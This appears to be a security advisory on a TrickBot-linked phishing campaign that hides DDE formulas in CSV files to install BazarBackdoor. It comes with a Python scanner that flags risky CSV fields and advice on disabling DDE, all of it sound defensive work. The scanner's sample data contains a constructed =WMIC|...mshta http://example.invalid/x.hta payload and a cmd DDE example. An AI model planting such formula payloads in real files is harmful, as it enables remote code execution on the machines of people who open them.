A new phishing campaign is using CSV files to deliver malware to unsuspecting users who mistakenly think that plain text CSV files are safe to open in Excel.
Comma Separated Values (CSV) files are produced by many applications as a universally compatible report format: they are plain text files containing rows of values separated by commas. In a world where the threats posed by malicious Microsoft Office documents and PDF files are well understood, your team may be lulled into thinking that a CSV is always safe to open. On Windows computers with Excel installed, this is not the case.
When Excel opens a CSV file, any field that begins with a formula character such as = is evaluated as a formula rather than displayed as text, regardless of how the field is quoted. Among the things a formula can contain is a Dynamic Data Exchange (DDE) link of the form =application|topic!item, which instructs Excel to launch the named application and pass it the topic string. The launched program can in turn download malicious scripts and execute them on the victim's computer.
The string =WMIC| at the start of a field in the CSV file is the tell-tale sign that Excel's DDE feature is being used to invoke the Windows Management Instrumentation Command-line utility (WMIC.exe), whose process call create verb can start an arbitrary program. A new phishing campaign linked to the TrickBot group is using this technique to install the BazarBackdoor trojan on the victim's computer.
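The following scanner is an added example, not code from the original article or from any of the groups or tools it mentions. It parses a CSV file the way Excel would see its fields (quoted fields unwrapped, doubled quotes collapsed) and flags every field Excel would evaluate as a formula, separating the ones that carry a DDE application|topic!item link from ordinary formulas. The sample CSV it runs over is constructed for the example; the WMIC payload in it is illustrative and not a real campaign artifact, and the helper names are the example's own.

```python
import csv
import io
import re

# Leading characters that make Excel evaluate a CSV field instead of showing it as text.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Shape of a DDE link inside a formula: <application>|<topic>!<item>,
# e.g. =WMIC|'process call create "..."'!A0 or =cmd|' /C calc'!A0.
# The topic is usually single-quoted; the application name may be followed by spaces.
DDE_PATTERN = re.compile(
    r"""(?P<app>[A-Za-z][\w.\\/:-]*)\s*\|\s*(?P<topic>'[^']*'|"[^"]*"|[^!]*)!"""
)

# Constructed sample report: one injected DDE field among otherwise benign values.
# Note the negative amount in the last row, which also starts with a trigger character.
SAMPLE_CSV = "\n".join([
    "Invoice,Customer,Amount",
    '1001,Acme Ltd,"1,250.00"',
    '1002,Globex,"=WMIC|\'process call create ""mshta http://example.invalid/x.hta""\'!A0"',
    "1003,Initech,-15.00",
]) + "\n"


def classify_cell(cell: str):
    """Return None for a benign value, 'formula' for a field Excel would evaluate,
    or 'dde' when that formula carries a DDE application|topic!item link."""
    stripped = cell.lstrip()
    if not stripped or stripped[0] not in FORMULA_TRIGGERS:
        return None
    # Plain numbers such as -15.00 or +3 start with a trigger character but are
    # ordinary values; flagging them would bury real findings in false positives.
    try:
        float(stripped)
        return None
    except ValueError:
        pass
    if DDE_PATTERN.search(stripped):
        return "dde"
    return "formula"


def find_suspicious_cells(csv_text: str):
    """Scan CSV text and return a list of findings with 1-based row/column positions.
    The csv module applies RFC 4180 quoting rules, so the field values inspected here
    are what Excel would load into the cell."""
    findings = []
    reader = csv.reader(io.StringIO(csv_text))
    for row_no, row in enumerate(reader, start=1):
        for col_no, cell in enumerate(row, start=1):
            kind = classify_cell(cell)
            if kind is None:
                continue
            app = None
            if kind == "dde":
                app = DDE_PATTERN.search(cell.lstrip()).group("app")
            findings.append(
                {"row": row_no, "col": col_no, "kind": kind, "app": app, "cell": cell}
            )
    return findings


if __name__ == "__main__":
    for f in find_suspicious_cells(SAMPLE_CSV):
        target = f" -> launches {f['app']}" if f["app"] else ""
        print(f"row {f['row']} col {f['col']}: {f['kind']}{target}: {f['cell']!r}")
```

Run against a mail gateway quarantine or a shared drive, a 'dde' finding is worth an immediate block, while a plain 'formula' finding (a =SUM or =HYPERLINK in a report) is usually legitimate but still worth a look, since Excel evaluates it before the user sees anything. The float() check is deliberate: negative amounts are common in financial exports and would otherwise drown the output in noise.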
When it encounters a DDE link in a CSV file, a modern version of Excel warns the user: first that automatic updating of links has been disabled, and then, if the user enables them, that Excel needs to start another application (here WMIC.EXE) and that this could be unsafe. The attack therefore depends on the user clicking through both prompts, and the email that delivered the CSV file typically carries instructions designed to make them do exactly that. This is made easier by the fact that a quick search for WMIC.exe reveals it to be a legitimate part of Microsoft Windows, which reassures the user rather than alarming them.
If your Security Awareness Training has included any guidance that CSV files are safe to open compared with PDF or Office documents, you may wish to revise that advice. On the technical side, DDE can be switched off in Excel's Trust Center (External Content settings) and, at scale, through the registry settings Microsoft published in security advisory ADV170021; with DDE server launch disabled, the =WMIC| link produces no prompt and launches nothing.